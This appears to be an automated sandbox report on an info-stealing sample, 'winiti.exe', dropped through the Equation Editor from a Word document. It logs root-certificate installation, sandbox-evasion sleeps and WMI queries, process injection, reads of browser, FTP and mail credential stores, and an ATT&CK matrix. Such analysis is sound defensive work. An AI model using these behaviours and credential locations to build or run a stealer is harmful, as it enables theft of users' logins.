                    Source: C:\Users\user\AppData\Roaming\winiti.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exeJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\winiti.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\winiti.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\AppData\Roaming\winiti.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 190000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 2460000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 5B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 80E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 5380000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 90E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 57B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 290000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 2230000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 600000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeWindow / User API: threadDelayed 9685Jump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3264Thread sleep time: -240000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3412Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3524Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3584Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3584Thread sleep time: -300000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3588Thread sleep count: 9685 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exe TID: 3588Thread sleep count: 128 > 30Jump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3688Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\winiti.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\winiti.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\winiti.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Users\user\AppData\Roaming\winiti.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeQueries volume information: C:\Users\user\AppData\Roaming\winiti.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeQueries volume information: C:\Users\user\AppData\Roaming\winiti.exe VolumeInformationJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 5.2.winiti.exe.34c5b90.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.winiti.exe.3489570.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.winiti.exe.34c5b90.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.winiti.exe.3489570.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: winiti.exe PID: 3392, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: winiti.exe PID: 3468, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\winiti.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\winiti.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 5.2.winiti.exe.34c5b90.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.winiti.exe.3489570.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.winiti.exe.34c5b90.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.winiti.exe.3489570.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.714490437.0000000002280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: winiti.exe PID: 3392, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: winiti.exe PID: 3468, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 5.2.winiti.exe.34c5b90.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.winiti.exe.3489570.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.winiti.exe.34c5b90.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.winiti.exe.3489570.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: winiti.exe PID: 3392, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: winiti.exe PID: 3468, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    12
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts33
                    Exploitation for Client Execution
                    Boot or Logon Initialization Scripts111
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    24
                    System Information Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    11
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Install Root Certificate
                    NTDS1
                    Query Registry
                    Distributed Component Object Model1
                    Input Capture
                    33
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing
                    LSA Secrets1
                    Process Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials141
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading
                    DCSync1
                    Application Window Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Modify Registry
                    Proc Filesystem1
                    Remote System Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
                    Virtualization/Sandbox Evasion
